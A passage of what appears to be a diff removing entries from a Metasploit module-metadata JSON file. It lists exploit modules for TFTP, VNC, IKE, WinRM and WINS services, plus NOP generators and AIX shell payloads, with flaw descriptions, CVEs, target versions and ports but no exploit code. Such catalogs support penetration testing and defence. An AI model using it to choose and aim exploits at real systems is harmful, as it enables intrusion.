"aushack " - ], - "description": "This module exploits a stack buffer overflow in D-Link TFTP 1.0.\n By sending a request for an overly long file name, an attacker\n could overflow a buffer and execute arbitrary code. 
For best results,\n use bind payloads with nonx (No NX).", - "references": [ - "CVE-2007-1435", - "OSVDB-33977", - "BID-22923" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English", - "Windows 2000 SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/dlink_long_filename.rb", - "is_install_path": true, - "ref_name": "windows/tftp/dlink_long_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/futuresoft_transfermode": { - "name": "FutureSoft TFTP Server 2000 Transfer-Mode Overflow", - "fullname": "exploit/windows/tftp/futuresoft_transfermode", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-05-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the FutureSoft TFTP Server\n 2000 product. By sending an overly long transfer-mode string, we were able\n to overwrite both the SEH and the saved EIP. A subsequent write-exception\n that will occur allows the transferring of execution to our shellcode\n via the overwritten SEH. 
This module has been tested against Windows\n 2000 Professional and for some reason does not seem to work against\n Windows 2000 Server (could not trigger the overflow at all).", - "references": [ - "CVE-2005-1812", - "OSVDB-16954", - "BID-13821" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 Pro English ALL", - "Windows XP Pro SP0/SP1 English", - "Windows NT SP5/SP6a English", - "Windows 2003 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/futuresoft_transfermode.rb", - "is_install_path": true, - "ref_name": "windows/tftp/futuresoft_transfermode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/netdecision_tftp_traversal": { - "name": "NetDecision 4.2 TFTP Writable Directory Traversal Execution", - "fullname": "exploit/windows/tftp/netdecision_tftp_traversal", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-05-16", - "type": "exploit", - "author": [ - "Rob Kraus", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in NetDecision 4.2 TFTP server. 
The\n software contains a directory traversal vulnerability that allows a remote attacker\n to write arbitrary file to the file system, which results in code execution under\n the context of user executing the TFTP Server.", - "references": [ - "CVE-2009-1730", - "OSVDB-54607", - "BID-35002" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2" - ], - "mod_time": "2021-01-28 10:35:25 +0000", - "path": "/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb", - "is_install_path": true, - "ref_name": "windows/tftp/netdecision_tftp_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/opentftp_error_code": { - "name": "OpenTFTP SP 1.4 Error Packet Overflow", - "fullname": "exploit/windows/tftp/opentftp_error_code", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-07-05", - "type": "exploit", - "author": [ - "tixxDZ", - "steponequit" - ], - "description": "This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable\n condition triggers when the TFTP opcode is configured as an error packet, the TFTP\n service will then format the message using a sprintf() function, which causes an\n overflow, therefore allowing remote code execution under the context of SYSTEM.\n\n The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',\n or 'Service'). 
By default the target is set to 'Service' because that's the default\n configuration during OpenTFTP Server SP 1.4's installation.", - "references": [ - "CVE-2008-2161", - "OSVDB-44904", - "BID-29111", - "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "OpenTFTP 1.4 Service", - "OpenTFTP 1.4 Stand Alone" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/opentftp_error_code.rb", - "is_install_path": true, - "ref_name": "windows/tftp/opentftp_error_code", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/quick_tftp_pro_mode": { - "name": "Quick FTP Pro 2.1 Transfer-Mode Overflow", - "fullname": "exploit/windows/tftp/quick_tftp_pro_mode", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-03-27", - "type": "exploit", - "author": [ - "Saint Patrick" - ], - "description": "This module exploits a stack buffer overflow in the Quick TFTP Pro server\n product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n in a DoS. 
This is a port of a sploit by Mati \"muts\" Aharoni.", - "references": [ - "CVE-2008-1610", - "OSVDB-43784", - "BID-28459", - "URL-http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Server 2000", - "Windows XP SP2" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb", - "is_install_path": true, - "ref_name": "windows/tftp/quick_tftp_pro_mode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/tftpd32_long_filename": { - "name": "TFTPD32 Long Filename Buffer Overflow", - "fullname": "exploit/windows/tftp/tftpd32_long_filename", - "aliases": [], - "rank": 200, - "disclosure_date": "2002-11-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in TFTPD32 version 2.21\n and prior. 
By sending a request for an overly long file name\n to the tftpd32 server, a remote attacker could overflow a buffer and\n execute arbitrary code on the system.", - "references": [ - "CVE-2002-2226", - "OSVDB-45903", - "BID-6199" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows NT 4.0 SP6a English", - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/tftpd32_long_filename.rb", - "is_install_path": true, - "ref_name": "windows/tftp/tftpd32_long_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/tftpdwin_long_filename": { - "name": "TFTPDWIN v0.4.2 Long Filename Buffer Overflow", - "fullname": "exploit/windows/tftp/tftpdwin_long_filename", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-09-21", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. 
By sending\n an overly long file name to the tftpd.exe server, the stack can be overwritten.", - "references": [ - "CVE-2006-4948", - "OSVDB-29032", - "BID-20131", - "EDB-3132" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal - tftpd.exe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/tftpdwin_long_filename.rb", - "is_install_path": true, - "ref_name": "windows/tftp/tftpdwin_long_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/tftpserver_wrq_bof": { - "name": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", - "fullname": "exploit/windows/tftp/tftpserver_wrq_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-03-26", - "type": "exploit", - "author": [ - "Mati Aharoni", - "Datacut" - ], - "description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\n is due to the way TFTP handles the filename parameter extracted from a WRQ request.\n The server will append the user-supplied filename to TFTP server binary's path\n without any bounds checking, and then attempt to check this path with a fopen().\n Since this isn't a valid file path, fopen() returns null, which allows the\n corrupted data to be used in a strcmp() function, causing an access violation.\n\n Since the offset is sensitive to how the TFTP server is launched, you must know\n in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\n , and then manually select your target accordingly. A successful attempt will lead\n to remote code execution under the context of SYSTEM if run as a service, or\n the user if run as a standalone. 
A failed attempt will result a denial-of-service.", - "references": [ - "CVE-2008-1611", - "OSVDB-43785", - "BID-18345", - "EDB-5314" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/SP3 EN Service Mode", - "Windows XP SP2/SP3 EN Standalone Mode", - "Windows 7 SP0/SP1 EN x64 Service Mode", - "Windows 7 SP0/SP1 EN x64 Standalone Mode", - "Windows 7 SP0/SP1 EN x86 Service Mode", - "Windows 7 SP0/SP1 EN x86 Standalone Mode" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb", - "is_install_path": true, - "ref_name": "windows/tftp/tftpserver_wrq_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/threectftpsvc_long_mode": { - "name": "3CTftpSvc TFTP Long Mode Buffer Overflow", - "fullname": "exploit/windows/tftp/threectftpsvc_long_mode", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-11-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. 
By\n sending a specially crafted packet with an overly long mode\n field, a remote attacker could overflow a buffer and execute\n arbitrary code on the system.", - "references": [ - "CVE-2006-6183", - "OSVDB-30758", - "BID-21301", - "URL-http://web.archive.org/web/20070521014920/http://secunia.com:80/advisories/23113" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "3CTftpSvc 2.0.1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb", - "is_install_path": true, - "ref_name": "windows/tftp/threectftpsvc_long_mode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/unicenter/cam_log_security": { - "name": "CA CAM log_security() Stack Buffer Overflow (Win32)", - "fullname": "exploit/windows/unicenter/cam_log_security", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-08-22", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a vulnerability in the CA CAM service\n by passing a long parameter to the log_security() function.\n The CAM service is part of TNG Unicenter. 
This module has\n been tested on Unicenter v3.1.", - "references": [ - "CVE-2005-2668", - "OSVDB-18916", - "BID-14622" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "W2API.DLL TNG 2.3", - "Windows 2000 SP0-SP4 English", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English", - "Windows 2003 SP0 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/unicenter/cam_log_security.rb", - "is_install_path": true, - "ref_name": "windows/unicenter/cam_log_security", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vnc/realvnc_client": { - "name": "RealVNC 3.3.7 Client Buffer Overflow", - "fullname": "exploit/windows/vnc/realvnc_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2001-01-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).", - "references": [ - "CVE-2001-0167", - "OSVDB-6281", - "BID-2305" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English", - "Windows XP SP2 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vnc/realvnc_client.rb", - "is_install_path": true, - "ref_name": "windows/vnc/realvnc_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vnc/ultravnc_client": { - "name": "UltraVNC 1.0.1 Client Buffer Overflow", - "fullname": "exploit/windows/vnc/ultravnc_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-04-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer 
overflow in UltraVNC Win32\n Viewer 1.0.1 Release.", - "references": [ - "CVE-2006-1652", - "OSVDB-24456", - "BID-17378" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English", - "Windows XP SP2 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vnc/ultravnc_client.rb", - "is_install_path": true, - "ref_name": "windows/vnc/ultravnc_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vnc/ultravnc_viewer_bof": { - "name": "UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow", - "fullname": "exploit/windows/vnc/ultravnc_viewer_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-02-06", - "type": "exploit", - "author": [ - "noperand" - ], - "description": "This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.\n\n If a malicious server responds to a client connection indicating a minor\n protocol version of 14 or 16, a 32-bit integer is subsequently read from\n the TCP stream by the client and directly provided as the trusted size for\n further reading from the TCP stream into a 1024-byte character array on\n the stack.", - "references": [ - "CVE-2008-0610", - "OSVDB-42840", - "BID-27561" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb", - "is_install_path": true, - "ref_name": "windows/vnc/ultravnc_viewer_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vnc/winvnc_http_get": { - "name": "WinVNC Web Server GET Overflow", - 
"fullname": "exploit/windows/vnc/winvnc_http_get", - "aliases": [], - "rank": 200, - "disclosure_date": "2001-01-29", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in the AT&T WinVNC version\n <= v3.3.3r7 web server. When debugging mode with logging is\n enabled (non-default), an overly long GET request can overwrite\n the stack. This exploit does not work well with VNC payloads!", - "references": [ - "BID-2306", - "OSVDB-6280", - "CVE-2001-0168" - ], - "platform": "Windows", - "arch": "", - "rport": 5800, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows NT4 SP3-6", - "Windows 2000 SP1-4", - "Windows XP SP0-1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vnc/winvnc_http_get.rb", - "is_install_path": true, - "ref_name": "windows/vnc/winvnc_http_get", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vpn/safenet_ike_11": { - "name": "SafeNet SoftRemote IKE Service Buffer Overflow", - "fullname": "exploit/windows/vpn/safenet_ike_11", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-06-01", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n service. When sending a specially crafted udp packet to port 62514 an\n attacker may be able to execute arbitrary code. 
This module has\n been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n windows/meterpreter/reverse_ord_tcp payloads.", - "references": [ - "CVE-2009-1943", - "OSVDB-54831", - "BID-35154", - "URL-http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1" - ], - "platform": "Windows", - "arch": "", - "rport": 62514, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SafeNet Irelke 10.8.0.20", - "SafeNet Irelke 10.8.0.10", - "SafeNet Irelke 10.8.3.6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vpn/safenet_ike_11.rb", - "is_install_path": true, - "ref_name": "windows/vpn/safenet_ike_11", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/winrm/winrm_script_exec": { - "name": "WinRM Script Exec Remote Code Execution", - "fullname": "exploit/windows/winrm/winrm_script_exec", - "aliases": [], - "rank": 0, - "disclosure_date": "2012-11-01", - "type": "exploit", - "author": [ - "thelightcosine" - ], - "description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2 (and above) and VBS CmdStager.\n\n The module will check if Powershell is available, and if so uses\n that method. 
Otherwise it falls back to the VBS CmdStager which is\n less stealthy.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 5985, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443, - 5985, - 5986 - ], - "autofilter_services": [ - "http", - "https", - "winrm" - ], - "targets": [ - "Windows" - ], - "mod_time": "2023-01-03 11:26:07 +0000", - "path": "/modules/exploits/windows/winrm/winrm_script_exec.rb", - "is_install_path": true, - "ref_name": "windows/winrm/winrm_script_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/wins/ms04_045_wins": { - "name": "MS04-045 Microsoft WINS Service Memory Overwrite", - "fullname": "exploit/windows/wins/ms04_045_wins", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-12-14", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits an arbitrary memory write flaw in the\n WINS service. 
This exploit has been tested against Windows\n 2000 only.", - "references": [ - "CVE-2004-1080", - "OSVDB-12378", - "BID-11763", - "MSB-MS04-045" - ], - "platform": "Windows", - "arch": "", - "rport": 42, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/wins/ms04_045_wins.rb", - "is_install_path": true, - "ref_name": "windows/wins/ms04_045_wins", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "nop_aarch64/simple": { - "name": "Simple", - "fullname": "nop/aarch64/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "timwr" - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/aarch64/simple.rb", - "is_install_path": true, - "ref_name": "aarch64/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_armle/simple": { - "name": "Simple", - "fullname": "nop/armle/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm " - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/armle/simple.rb", - "is_install_path": true, - "ref_name": "armle/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_cmd/generic": { - "name": "Generic 
Command Nop Generator", - "fullname": "nop/cmd/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm ", - "bcoles " - ], - "description": "Generates harmless padding for command payloads.", - "references": [], - "platform": "All", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-28 15:29:56 +0000", - "path": "/modules/nops/cmd/generic.rb", - "is_install_path": true, - "ref_name": "cmd/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_mipsbe/better": { - "name": "Better", - "fullname": "nop/mipsbe/better", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "jm" - ], - "description": "Better NOP generator", - "references": [], - "platform": "All", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/mipsbe/better.rb", - "is_install_path": true, - "ref_name": "mipsbe/better", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_php/generic": { - "name": "PHP Nop Generator", - "fullname": "nop/php/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm " - ], - "description": "Generates harmless padding for PHP scripts", - "references": [], - "platform": "All", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/php/generic.rb", - "is_install_path": true, - "ref_name": "php/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": false - }, - "nop_ppc/simple": { - "name": "Simple", - "fullname": "nop/ppc/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm " - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/ppc/simple.rb", - "is_install_path": true, - "ref_name": "ppc/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_riscv32le/simple": { - "name": "Simple", - "fullname": "nop/riscv32le/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "bcoles " - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "riscv32le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-01 02:46:28 +0000", - "path": "/modules/nops/riscv32le/simple.rb", - "is_install_path": true, - "ref_name": "riscv32le/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_riscv64le/simple": { - "name": "Simple", - "fullname": "nop/riscv64le/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "bcoles " - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "riscv64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-01 02:46:28 +0000", - "path": "/modules/nops/riscv64le/simple.rb", - "is_install_path": true, - "ref_name": "riscv64le/simple", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_sparc/random": { - "name": "SPARC NOP Generator", - "fullname": "nop/sparc/random", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "vlad902 " - ], - "description": "SPARC NOP generator", - "references": [], - "platform": "All", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/sparc/random.rb", - "is_install_path": true, - "ref_name": "sparc/random", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_tty/generic": { - "name": "TTY Nop Generator", - "fullname": "nop/tty/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm " - ], - "description": "Generates harmless padding for TTY input", - "references": [], - "platform": "All", - "arch": "tty", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/tty/generic.rb", - "is_install_path": true, - "ref_name": "tty/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_x64/simple": { - "name": "Simple", - "fullname": "nop/x64/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "sf " - ], - "description": "An x64 single/multi byte NOP instruction generator.", - "references": [], - "platform": "All", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/x64/simple.rb", - "is_install_path": true, - "ref_name": "x64/simple", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_x86/opty2": { - "name": "Opty2", - "fullname": "nop/x86/opty2", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "spoonm ", - "optyx " - ], - "description": "Opty2 multi-byte NOP generator", - "references": [], - "platform": "All", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/x86/opty2.rb", - "is_install_path": true, - "ref_name": "x86/opty2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_x86/single_byte": { - "name": "Single Byte", - "fullname": "nop/x86/single_byte", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "spoonm " - ], - "description": "Single-byte NOP generator", - "references": [], - "platform": "All", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/x86/single_byte.rb", - "is_install_path": true, - "ref_name": "x86/single_byte", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "payload_aix/ppc/shell_bind_tcp": { - "name": "AIX Command Shell, Bind TCP Inline", - "fullname": "payload/aix/ppc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "AIX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 
+0000", - "path": "/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "aix/ppc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_aix/ppc/shell_find_port": { - "name": "AIX Command Shell, Find Port Inline", - "fullname": "payload/aix/ppc/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "AIX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/aix/ppc/shell_find_port.rb", - "is_install_path": true, - "ref_name": "aix/ppc/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_aix/ppc/shell_interact": { - "name": "AIX execve Shell for inetd", - "fullname": "payload/aix/ppc/shell_interact", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jduck " - ], - "description": "Simply execve /bin/sh (for inetd programs)", - "references": [], - "platform": "AIX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/aix/ppc/shell_interact.rb", - "is_install_path": true, - "ref_name": "aix/ppc/shell_interact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - 
